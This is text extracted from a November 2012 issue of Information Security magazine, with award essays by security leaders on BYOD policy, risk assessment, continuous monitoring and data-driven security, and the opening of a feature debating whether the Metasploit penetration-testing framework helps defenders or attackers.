2012 SECURITY 7 AWARDS: TELECOMMUNICATIONS

You hear a lot more people talking about it than actually doing it. Thus, while we may have the right prescription, it doesn’t appear that we’re consistently taking our meds.

One of the advantages to being a researcher is that you get to highlight and study the problems without having to immediately advocate definitive solu-tions. And I’m going to hide behind that here, because the challenges of infor-mation sharing won’t be solved after you read this. But I do hope to provide some sense of direction for tomorrow. In that spirit, I have found that the three primary roadblocks to successful security information sharing are language, trust and incentives.

By language, I mean we have no commonly agreed upon taxonomy for the information we need to share. If I’m speaking apples and you’re speaking or-anges, we’re not going to have a mutual understanding. Thus, a common vo-cabulary is essential to building a data set of sufficient size and quality to meet our decision-making needs.

Assuming we overcome the language barrier in order to create apples-to-apples data, we must still trust each other enough to share it. In an industry dedicated to secrecy and protection, this runs counter to our mindset. Find-ing trustworthy partners and establishing trustworthy methods of sharing with them will be key to unlocking the potential that exists.

And that potential might be the most critical piece. At the end of the day, if there is no incentive to share, we’ll never put forth the effort to develop a com-mon language or necessary trust. We must make it clear to those responsible for day-to-day security operations what they stand to gain in terms of effective-ness and efficiency with better information. We must help executives see how they can make better decisions and justify those decisions to others.

I’m not saying it’ll be easy, but I think we can do it. One of my favorite as-pects of working on the Verizon Data Breach Investigations Reports is that I get to—hopefully—demonstrate that sharing sensitive information can actu-ally work, even across public-private and international boundaries, and that the product of sharing is beneficial to many recipients at many different levels. I view it as a small contribution toward dispelling the dogma of today and driv-ing better decisions for tomorrow. n

24INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: HEALTH CARE

Embracing BYODOrganizations need to consider the benefits, IT challenges and risks when implementing a BYOD policy. BY KRISHNAN CHELLAKARAI

WITH A RISING need to be more productive, efficient and fast, there is recogni-tion among business leaders that a more mobile workforce is becoming a true necessity. Enabling a mobile workforce is, however, an expensive proposition. Usage costs and the cost to purchase and maintain mobile devices, applications and backend services such as security have curtailed many businesses from of-fering employees a corporate-issued smartphone or tablet.

At the same time, there’s been a dramatic shift in consumer behavior with the introduction of smart devices like the iPhone, iPad and Android-based de-vices. More and more users are adopting and willingly using these non-sanc-tioned smart devices in their workplace to access corporate resources, a be-havior that has indirectly benefited the businesses in many ways. As business leaders recognize the value of personally owned devices in the workplace, they are putting increasing pressure on IT to allow the use of these devices to access internal corporate resources.

KRISHNANCHELLAKARAIGlobal Principal

Security Architect,

Roche Pharma at Genentech

(Roche Group)

H As enterprise security architect at Genentech and Roche, Krishnan leads the development and implementation of a three- to five-year security roadmap for a global organization with more than 90 locations and 110,000 users.

H Recently led a security audit remediation effort that trans-formed the security framework at Roche. New functionality includes application whitelisting software, behavior-based mal-ware protection for Web and email, and strong authentication for remote access.

H Published whitepapers on enterprise Web access management, cloud security and mobility, and choice computing.

25INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: HEALTH CARE

This major shift in business behavior is challenging IT organizations in new ways. IT organizations are no longer in sole control of the end-user tools that they traditionally have dictated.

The first question to ask is, “Are we ready to embrace the trend of bring your own device (BYOD)?” The answer definitely should be “yes.” Many forward-thinking companies have already embraced the BYOD trend and are realizing the next significant increase in end-user productivity. BYOD is not a short-term movement; it is here to stay whether you have a BYOD policy in place or not.

In a nutshell, we should embrace the expanding business movement to BYOD instead of staying away or fighting the growing business demands driv-ing it. Consider these organizational benefits of a BYOD strategy:

■n Increased productivity of the end user to do his job from anywhere, at any time.■n Guaranteed employee satisfaction by allowing end users the choice to use their

own personal device.■n Single device solution that eliminates the need for the end user to carry mul-

tiple devices.■n Cost savings: No need to buy and issue a new device to end users.

Obviously, the next big question is how do we harness the benefits of the BYOD movement, yet mitigate IT challenges and the organizational risks linked with BYOD? These challenges can be vetted and addressed thoroughly via clear policies and business processes as described below:

■n IT security and privacy policy: Develop appropriate policy and procedures for employees and IT support staff on acceptable use policy and incident reporting.■n Device ownership: Develop a term-of-use consent form for employees to agree

and abide to prior to gaining access to corporate systems and data. ■n Device management standards: Manage the device using a centralized device

management tool and enforce security controls such as password lock and ap-plication usage restrictions.■n Securing the data: Deploy tools and enforce controls to secure the corporate

data stored on the device.■n Data segmentation: Separate personal data from corporate data on the devices.■n IT support: IT support and additional training for supporting the personal de-

vices and managing increased service desk calls.

26INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: HEALTH CARE

■n Communication: Develop and communicate BYOD policy, procedures and support through security awareness training for end users. ■n Data plan: Monitor the cost of data plan usage and lack of control to deter-

mine the cost for personal use versus corporate use.

When embracing BYOD, organizations also need to be aware of the risks that are introduced with this policy. Key risks to evaluate are:

■n Application control: Uncontrolled and unsecured applications that could be installed on the device by the user. ■n Potential data loss: This requires eliminating or reducing exposure of sensi-

tive and critical data.■n Local labor laws/issues: Local and/or country labor laws that prevent users

from working for more than normal working hours. Employment agreements need to be updated to manage possible Fair Labor Standard Act-related risk.■n Potential privacy issue: Tools employed by IT to manage the device could

monitor and track the location of the device, which may introduce a privacy issue in certain countries for the organization.■n Regulatory requirements: Businesses that operate in specific industries like

health care or finance fall under strict regulatory compliance mandates. SOX, HIPAA, GLBA, PCI DSS and other compliance frameworks outline which data must be protected and provide basic guidelines for how that data should be protected. Ensure regulatory compliance within BYOD policies.■n Lost and stolen devices: End-user training for immediate reporting of loss or

theft of a personal device with business access. ■n Data recovery: Clear delineation of who owns the data stored on the device

and how to recover or wipe the data when an end user leaves the organization.

Embracing BYOD technology is just one of the many issues that IT must manage, but it may not be the biggest challenge. Legal ownership of data stored on a personal device may be an even bigger challenge for organizations to over-come. Defining the appropriate policies with the expectation that the criteria will be different for different business units and types of personnel is essential to managing organizational security. Creating the appropriate balance between benefits/risks within your organization will be critical to implementing a suc-cessful BYOD strategy. n

27INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: IN MEMORIAM

Security WarriorRon Knode, who passed away earlier this year, was a tireless advocate for cloud security transparency. BY JIM REAVIS

THE INFORMATION SECURITY industry has always attracted unique personalities with eclectic skill sets. Information security is not simply about solving mathemati-cal problems, focusing on bandwidth, maximizing storage capacity or answer-ing other questions with objective certainties. Information security is art and science, technology and strategy, thoughtful design, quick reflexes and match-ing wits with a skilled adversary. From software programming and finance to marketing and heavy doses of the Art of War, the typical information security skill sets are in fact atypical in the IT industry.

Ron Knode represented the prototypical information security professional of the future: He accomplished much in his career to advance the cause of the industry while relying upon a diverse skill set. Ron’s background as a military officer, scientist and professor allowed him to design sophisticated security sys-tems, advocate for key structural changes in IT, and mentor many experts. Ron conducted himself with great energy and an even greater sense of humor.

A graduate of the U.S. Naval Academy, Ron developed security systems for

RON KNODEServed as a

Consulting Trust Architect for CSC’s Cloud

Services

H Adjust associate professor, Towson University.

H Member of the leadership team of the CSA and a co-chair of the CSA Governance, Risk and Compliance (GRC) stack initiative. Au-thor of the CSA’s Cloud Trust Protocol (CTP), and head of the CTP initiative.

H In Ron’s memory, the Cloud Security Alliance instituted the an-nual Ron Knode Service Award, recognizing excellence in volun-teerism for three honorees from the Americas, Asia-Pacific and EMEA.

28INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: IN MEMORIAM

the U.S. Department of Defense and the intelligence agencies, many of which are still in use today. Ron variously held roles as a chief scientist and systems architect before capping his career as consulting director for security and trust architectures and service for Computer Sciences Corporation (CSC). Ron was most passionate about his role as an educator as an associate professor at Tow-son University.

Ron’s impact upon the Cloud Security Alliance was significant. While at CSC, Ron invented a technical specification called Cloud Trust Protocol (CTP) for cloud transparency. CTP is a specification to automate the capability to query any type of cloud provider in order to understand the provider’s ability to meet customer requirements, including but not limited to security, gover-nance, risk and compliance. The requirements to be evaluated are based on a concept of elements of transparency.

CSA discovered Ron and his CTP project and prevailed upon him and his employer to let CSA take over the development of CTP and incorporate it into the CSA Governance, Risk and Compliance (GRC) Stack. Ron joined CSA as part of the GRC leadership team and took an active role in the development of our research roadmap and GRC training. Ron’s fervent evangelism around the necessity of transparency on the part of providers was ahead of its time and quite influential in CSA’s strategy around GRC, including the development of the CSA Security, Trust and Assurance Registry (STAR). CSA volunteers will be working over the course of the next two years to fulfill Ron’s vision of robust security requirements, continuous monitoring and accountability on the part of cloud providers via transparency.

Beyond Ron’s tremendous technical prowess and business savvy, he was one of the most genuine and likeable people in our industry. Quick with a joke, caring about his co-workers, and dedicated to his family, Ron Knode was a one-of-a-kind security warrior who influenced many and left the world a bet-ter place. n

JIM REAVIS is co-founder and executive director of the Cloud Security Alliance.

29INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: ENERGY & UTILITY

Critical NeedsGRC management needs to adapt to meet the complex needs of critical infrastructure protection. BY DOUG POWELL

SECURITY THREAT RISK assessment tools in past decades were typically used to de-termine security mitigation strategies. Assessment consisted primarily of a pa-per and pen exercise that intended to compare existing security measures with accepted security practices of the day. A rash of ongoing or heightened security incidents often initiated the “security survey.” Completing these reviews re-lied on the expertise of a security professional who answered a number of pre-defined questions about practices, such as perimeter security, lighting, alarm systems, guard patrols and access control. These reviews focused on physical security and offered a limited risk management output; they were really a base-lining exercise to align security practices of the day with the plant or facility. IT security did not become involved in risk assessments or surveys until after the new millennium.

Today, within the cyber world, risk assessment has often been used in-terchangeably with vulnerability assessment. Vulnerability assessment is an

DOUGPOWELLManager of

Security, Privacy and Safety at

British Columbia Hydro & Power

Authority

H Oversees all aspects of security, privacy and safety within the smart grid program at BC Hydro, Canada’s third largest utility.

H Successfully implemented the critical infrastructure protection program for BC Hydro during the 2010 Winter Olympic Games in Vancouver.

H Contributes to standards development through ASIS and other organizations. Currently second vice chair of the ASIS Utilities Security Council and chairman of the ASIS Critical Infrastructure Working Group.

H Received commendation in 2011 from the Royal Canadian Mounted Police Critical Infrastructure Intelligence Team for his contribution to critical infrastructure protection initiatives.

30INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: ENERGY & UTILITY

important part of a risk assessment, but the two are not equivalent. Increas-ingly, organizations are practicing governance, risk and compliance (GRC) assessments. Within IT-GRC, we see the formation of an important triad on which risk management relies heavily. Effective governance for IT manage-ment, comprehensive risk management and compliance management are nec-essary to ensure IT risk is properly managed across the enterprise. In fact, each leg of the triad relies on the other. GRC is still a developing practice within the IT world, but it will have an even greater impact as a critical infrastructure (CI) risk management tool if appropriately matured and adapted to CI protection needs.

Typically, GRC management is referenced in the context of information technology needs. Within critical infrastructure applications, this usually trans-lates into a discussion about critical cyber assets, systems and processes that support CI. This may or may not extend into operational technologies (OT) such as SCADA (system control and data acquisition technology). For CI pro-tection, though, there are two pressing concerns when discussing critical infra-structure risk management that GRC management has not yet adapted itself to in a comprehensive way. The first is the need for ongoing, real-time assessment (as opposed to periodic assessment), and the second relates to physical and sit-uational awareness inputs. Without these inputs, GRC assessment has limited effectiveness for CI risk management.

Within critical infrastructure protection management, a constant state of vigilance is not possible or practical; many studies have shown that humans can’t remain on guard for extended periods of time. There should always be baseline vigilance, but protection systems must also be designed to provide au-tomated, advanced alerts that permit an escalation for a defensive posture suit-able for advanced, persistent threats. Some escalations may be rudimentary, while others are more complex, such as for a nuclear facility armed resistance or shut-down process. There are even more complex escalation processes that rely on the sharing of intelligence and lead to a coordinated defensive response with police or military. Such escalations normally involve initiation of special security rules, including special access rules, increased patrols, added security posts and vehicle inspections. Regardless, inputs to the ongoing risk assess-ment are needed in order for effective risk management decisions to be made at any level. Knowledge about targeted hacker threats, terrorist plots or com-plex malware can help escalate security across any CI sector. Knowledge about

31INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: ENERGY & UTILITY

adversary capabilities helps to define protection requirements.GRC assessment, therefore, has two imperatives in order to be effective for

CI protection: It must be applicable to the physical environment associated with CI protection (plants, dams, pipelines, buildings, etc.), and it must also be adaptable to environmental triggers and changes that inform risk rankings and result in appropriate assessment, leading to effective risk treatment. GRC cannot be limited to IT and cannot be a series of one-off assessments. GRC re-quires daily inputs from as many relevant sources as possible to inform the true risk picture. Full situational awareness is necessary during periods of escalated CI protection, such as during the Olympic Games or civil unrest. That means monitoring and managing stresses on the environment across a broad array of infrastructure (border protection, transportation systems, venues, internation-ally protected persons, etc.) and over a larger geographic footprint. Given the complexities associated with critical infrastructure protection, such as interna-tional resource management within climates of social unrest, GRC may need even greater inputs to become a truly effective tool for CI protection. n

32INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: EDUCATION

Team Effort Notre Dame created a committee to tackle risk assessment on an ongoing basis. BY DAVID SEIDL

HIGHER EDUCATION IS an interesting place to be if you are an information security professional. We work on campuses that are essentially small cities. Our orga-nizations often provide our own utilities, fire departments, power and police, and deal with transient populations that often make up a significant percentage of the local area’s total when school is in session. Campuses often have a variety of independent IT organizations, and those organizations are asked to act as an ISP, providing networking to a populace that may require most normal secu-rity tools to get out of the way. We also have a population that, in some cases, designed the basic technologies we’re using.

The security risks we face aren’t unique, but they are quite varied. Many se-curity professionals from the business world that I talk with cringe when I de-scribe a typical higher education environment! Thus, when I was asked to write about security in my area of expertise, I pondered common topics like phish-ing, reputation services, and what bring your own device (BYOD) means in an

DAVID SEIDLDirector of

Information Security,

University of Notre Dame

H Leads Notre Dame’s SSN Remediation program, which is designed to reduce the risk of inadvertent disclosure of Social Security numbers. The three-pronged strategy includes techni-cal remediation, business process reviews and the creation of a long-term governance structure for the management of highly sensitive information.

H Managed Notre Dame’s Information Security Program, a four-year effort involving 24 projects to create a long-term security infrastructure for the university. Key projects included creation of Notre Dame’s Security Operations Center.

H Cut vulnerability scanning costs by 50 percent in support of the university’s fiscal responsibility goals.

33INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: EDUCATION

open environment. What I realized was that all of it came down to the way we look at risk as an organization. If we don’t get that right, our technologies and policies won’t matter much.

Every organization realizes at some point that it needs to assess the risks it faces. Some organizations choose a standardized model for security risk assess-ment, others use a model devised in-house or hire expensive consultants. The worst case is one that takes the unfortunate option of denial. What the organi-zation chooses to do about risk is critical. Addressing risk can only be success-ful if management is willing to look at risks head-on, and take ownership of the security risk assessment process of handling them.

At Notre Dame, we do something that is relatively unique in my higher education experience. The executive vice president created—and personally chairs—a group known as the Institutional Risk and Compliance Committee. This group is composed of senior members of management, including func-tional roles like finance, IT and research, and covers each of the major business areas of the university. It is a diverse group with a big impact.

What makes the group different from many management teams is how it looks at risks, and how it reacts to risks. This diverse group has created a sim-ple process of yearly assessments conducted by each major business area in the university. Risks must affect the university as a whole, and they’re categorized on a simple high, medium and low scale for probability and impact, and col-ored red, yellow or green. Each one is then rated on its current status: un-han-dled and needs a plan; in progress with a plan; or handled as well as it can be handled. Again, each risk is red, yellow or green based on its status—a separate rating from its probability and impact. A quick glance at a chart tells the group what needs attention or provides a status check. Red risks with a red status rat-ing get attention quickly!

You will notice that the last rating for status isn’t “closed”—major risks to the organization are rarely something you can call done. Instead, you may com-plete your plan for handling the risks, but you continuously monitor them.

The broad view approach—the understanding that risks have a lifecycle—and the way members of the team work together are what sets this group apart. You see, over the life of the group, the members have become comfortable challenging each other and at asking questions that help their peers take a dif-ferent look at what they’re presenting. When the group gets together, sessions are lively. The sessions result in useful feedback and a lot of improvement in

34INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: EDUCATION

the risks that are identified, plans to address those risks and the entire group’s understanding of what the university faces.

The fact that executive-level support is needed to handle risks for an orga-nization is nothing new, and every risk assessment manual mentions it. What then can you take away from this?

Two things: First, there is hope. If your organization isn’t addressing risk in a realistic way, put your leadership in touch with an organization that is. Have them talk about methods, costs and benefits. Second, look at how you treat the security risk assessment process. Is it something you share with your peers? Are they comfortable with being upfront about it? And, most importantly, do they think about risk over time, or simply as a set of controls? Answer these questions and you just might realize it’s time to change how your organization handles the next big security risk. n

35INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: GOVERNMENT

Continuous Protection The U.S. Department of State developed a system for improving federal cybersecurity that can be used as a blueprint in the public and private sectors. BY JOHN STREUFERT

HISTORICALLY, THE CYBERSECURITY protection activities associated with the Federal Information Security Management Act (FISMA) of 2002 hinged on security reviews of process and compliance in the form of hard-copy documents con-tained within three-ring binders at a cost of $440 million per year across the federal government. By late 2009, $130 million had been spent at the Depart-ment of State alone (at a cost of $1,400 per page), with descriptions of overall technical risk for specific major systems that were rapidly out of date.

Though federal systems were being exploited at Internet speed, FISMA

JOHNSTREUFERT

Director, National Cyber

Security Division, Department of

Homeland Security

H■■In 2003, while deputy CIO for the U.S. Agency for International Development, created a technique to find and fix known vulner-abilities across 22 time zones for the U.S. Agency for Interna-tional Development. Refined these techniques for scoring risk, which were later called Continuous Monitoring, while serving as Department of State CISO from 2006-2012.

H■■Responsible for proposing revised FISMA practices that transi-tion manual control testing to automated processes and hold promise for a higher return on investment for the $1.5 billion spent annually in this part of the federal cybersecurity portfolio.

H■■Created a Concept of Operations for a phased implementation of Continuous Monitoring for federal cloud computing as part of the Federal Risk and Authorization Management Program (FedRAMP).

H■■Leads DHS effort to define and develop data metrics for evaluat-ing results to improve federal civilian cybersecurity defenses in the CyberScope security reporting program.

36INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: GOVERNMENT

compliance and its applicable authorities required manual security testing at least every three years. The dichotomy between federal requirements and what was actually needed to provide cybersecurity spurred the evolution to continu-ous monitoring and mitigation.

Exploits use known cyber vulnerabilities and configuration setting weak-nesses as the method of attack more than 80 percent of the time. In response, the U.S. Department of State automated scripts to scan its personal computers and servers at 260 embassies and consulates every one to three days. Commer-cial off-the-shelf sensors delivered details of unresolved security problems to an enterprise dashboard for attention to the worst problems first. By the end of July 2009, measured cyber risks were reduced by 89 percent across 24 time zones of department operations, and were published daily using letter grades A to F to mark progress. In the second year, one-third of the remaining risk across the enterprise was reduced to the 94 percent level, an accomplishment that was sustained over time.

The Department of State scores every security problem it finds, but assigned the highest point value to critical risks. Using a dashboard called iPost, system administrators’ attention was focused on the worst threats of the day. Critical patch coverage at the Department of State was repeatedly accomplished at the 84 percent level in seven days and the 93 percent level in one month.

In January 2012, the Department of Homeland Security assembled a team to implement these cybersecurity strategies across the .gov network using fund-ing set aside in the fiscal year 2012 federal budget. In August 2012, agreement in the House and the Senate signaled their support for a continuous cyber diag-nosis and mitigation program.

The next generation of cyber defenses will combine appropriate dashboard software features and sensors based on the Center for Strategic and Interna-tional Studies 20 Critical Security Controls for Effective Cyber Defense. In June, DHS announced specifications for the first phase of continuous monitor-ing and mitigation sensors, focused on hardware and software asset manage-ment, whitelisting/anti-malware defenses, and vulnerability and compliance setting management.

While plans for the future are still unfolding, the General Services Admin-istration intends to issue multiple award contracts for the federal government to buy cybersecurity tools for implementing continuous monitoring and miti-gation, with options available for other federal, state and local governments to

37INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: GOVERNMENT

make purchases for their separately operated defenses. The design of this ac-quisition aims for cybersecurity strategies that:

■n Organize defenses around sensors mapped to the 20 Critical Controls (in phases);■n Inspect systems daily, diagnose and then mitigate security problems across all federal networks, applications and cloud-based services over time; ■n Prioritize attention on those risks with the most impact and potential for occurring; and, ■n Measure the results and report progress in dealing with known cyberthreats to technicians, managers, executives and the public.

Adequate cybersecurity is a problem of national significance that warrants attention. Utilizing the combined buying power of federal, state and local gov-ernments to receive quantity discounts for cybersecurity tools helps maximize benefits for the taxpayer.

Establishing a continuous diagnosis and mitigation (CDM) program for your state or local government or for your business is an opportunity within grasp. These concepts were developed at taxpayers’ expense for the protection of federal networks, but are available and adaptable for the public or private sector, on a strictly voluntary basis. Send requests for further information to the Department of Homeland Security at [email protected]. n

38INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: FINANCIAL SERVICES

New EraThe information security industry needs to shift its focus to data-driven security. BY PRESTON WOOD

INFORMATION SECURITY HAS long been a profession with a keen focus on preventa-tive controls. However, with the cyberthreat becoming increasingly complex, I believe most information security functions need to adopt a control posture that includes sophisticated rapid detection and response capabilities, in addi-tion to preventative controls to continue to effectively mitigate risk. This re-quires harnessing the power of analytics to turn data into intelligence (detec-tion) in order to take rapid action (response). Enter the era of big data security analytics and data-driven security.

To illustrate this point, I’d like to contrast a traditional preventative infor-mation security practice to bank branch security. If information security pro-fessionals were to secure a branch using a preventative control mindset, the controls might look like this:

■n Armed guards at every known entrance to the building (firewalls); ■n Frisking procedures for anyone entering the building (virus scanning);

PRESTONWOOD

Executive VP and Chief Information

Security Officer, Zions

Bancorporation

H■■Oversees fraud, security analytics and forensics, information security, physical security, corporate investigations, technology and operations risk, and business resiliency objectives for eight banks in eight high-growth Western markets.

H■■More than 15 years of hands-on experience in IT, security and risk capacity.

H■■Served in multiple leadership and staff capacities throughout his career, giving him a unique blend of skills, combining real-world business and technology experience with a keen understanding of security and risk management.

39INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: FINANCIAL SERVICES

■n Blocking access to anyone who can’t clearly state why they want to enter the building (firewall rules); and ■n Once inside, armed guards continue to probe for appropriate conduct (data

loss prevention (DLP).

Clearly, a bank that adopts these security procedures for its branches might not have many customers visiting its branches.

In order for a bank branch to operate as intended, a particular risk needs to be recognized; people need to enter the branch to conduct business. The problem is, we don’t know if these people are honest law-abiding customers or criminals intending to steal from us. To mitigate risk for the branch without inconveniencing customers, we focus equally on prevention, detection and re-sponse controls (video surveillance, employee response procedures, rapid law enforcement involvement, etc.). These types of controls help keep risk at an acceptable level.

Like an unknown threat entering a bank branch, it is difficult to quickly de-termine the threat and mitigate risk to information systems without adopting sophisticated rapid detection and response capabilities and a more data-driven approach to decision making.

We started down our big data journey of becoming a data-driven security organization many years ago when we realized our security information and event management (SIEM) platform was underperforming, and ultimately not helping us truly analyze the data we were capturing. Rather than continue to support a platform that didn’t allow us to become more data-driven, we recog-nized that in order to capture, retain and analyze data we needed to invest in an infrastructure much more akin to business intelligence technologies than traditional security technologies. Over the past six years we have invested in people with the skills to analyze data and technologies with the scale and per-formance to adequately handle the massive amounts of data necessary for ro-bust security analytics. This has resulted in what we like to call our security data warehouse.

The core of our security data warehouse is Hadoop, but it is not the sole tech-nology that makes up our analytic capabilities. The security data warehouse is more of an ecosystem of technologies assembled in a way that allows us to store massive amounts of varying data, quickly access this data for analysis, and turn the analysis into actionable intelligence. Fortunately, technologies are

40INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: FINANCIAL SERVICES

now being made available for organizations to create their own security analyt-ics ecosystem.

Having the technology in place to leverage big data for security is only part of the equation—it is equally important to have people with the skill set to con-duct analysis. No tool will magically turn data into intelligence; it takes people with inquisitive minds and data analytics skill sets to make connections be-tween varieties of data points.

Unfortunately, because the industry has focused so long on preventative control solutions (and often commercial off-the-shelf preventative solutions), I believe there will be a call for security professionals to become more data driven. This call for relearning will require security professionals to start asking questions of their data and to develop more data analytic skills.

I believe we are on the edge of an exciting new era for the information se-curity field, an era in which organizations have the ability to analyze internal and external data and turn it into actionable intelligence. Those who choose to adopt a data-driven direction will be able to better rationalize their con-trol costs, blend quantitative and qualitative decision making for improved risk management, and ultimately gain a much-needed edge in our rapidly changing information economy. n

41INFORMATION SECURITY n NOVEMBER 2012

By George V. Hulme

SECURITY SALVATION OR SABOTAGE?Some say Metasploit is a critical tool for improving enterprise security, while others say it helps attackers.

METASPLOIT

IS THERE SUCH a thing as a security tool that’s too effective? Sounds silly. You’d probably never hear of a firewall being called too effective or an encryption al-gorithm as being too un-crackable. However, some observers have, over the years accused the Metasploit penetration testing framework of being just that: too fast at publishing exploits and too good at taking advantage of vulnerabili-ties in the networks it’s used against.

One recent example of why Metasploit raises concern involved a Java zero-day vulnerability that surfaced in August and affected millions of users of com-mon Web browsers—Internet Explorer, Mozilla, Firefox, Safari on Windows,

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

42INFORMATION SECURITY n NOVEMBER 2012

THREAT MANAGEMENT

Linux, as well as Mac OS X systems. Attacks on the flaw made it possible to compromise at-risk systems. And, before Oracle released a patch for the flaw, publicly available exploit code was added to the Metasploit framework.

Such tools can be used to help security pros and system owners strengthen and test their security, but they can also be used by criminals to break into vul-nerable systems. This “dual-use” capability of Metasploit has made it contro-versial at times, and such tools have even been outlawed in some nations. One of the biggest concerns often cited is that when exploits are released, attackers can put them to use quicker than organizations can patch their dozens, or even tens of thousands, of systems.

METASPLOIT REVIEW: HELP OR HINDRANCE?Not surprisingly, HD Moore, the creator of Metasploit, one of the founders and current chief architect of the initiative, and chief security officer at Boston-based security vendor Rapid7, has a much different view. Metasploit is main-tained by Rapid7, which acquired the framework in 2009.

“Metasploit, like other dual-use security tools, is great at raising awareness and providing defenders with a way to measure their risk,” Moore says. “The availability of clean exploits to the public at large has helped level the playing field against criminals.” Additionally, Moore points out that nearly every re-cent client-side exploit (those found in Internet Explorer, Adobe Flash, Java, etc.) placed into Metasploit was discovered first in the wild, and then ported from that live sample into a clean version of the toolset.

Not everyone agrees with Moore’s assertion that Metasploit “helps to level the playing field.” “While it’s correct to say that individual organizations can re-duce their own risk with tools like Metasploit, in the aggregate everyone’s risk is increased significantly,” argues Pete Lindstrom, research director at security research firm Spire Security. “The attackers can hit long before most organiza-tions have time to patch.”

In-the-field practitioners and software vulnerability researchers take a dif-ferent view of Metasploit’s applicability. “You can’t be a car mechanic and fix an engine without tools. And you can’t be a penetration tester and fix bad system security without evaluating the security of those systems. If tools like Metasploit were not available, the bad guys would be writing their own tools anyway. That would leave the good guys unarmed,” says David Litchfield, chief

EDITOR’S DESK

PERSPECTIVES

SCAN

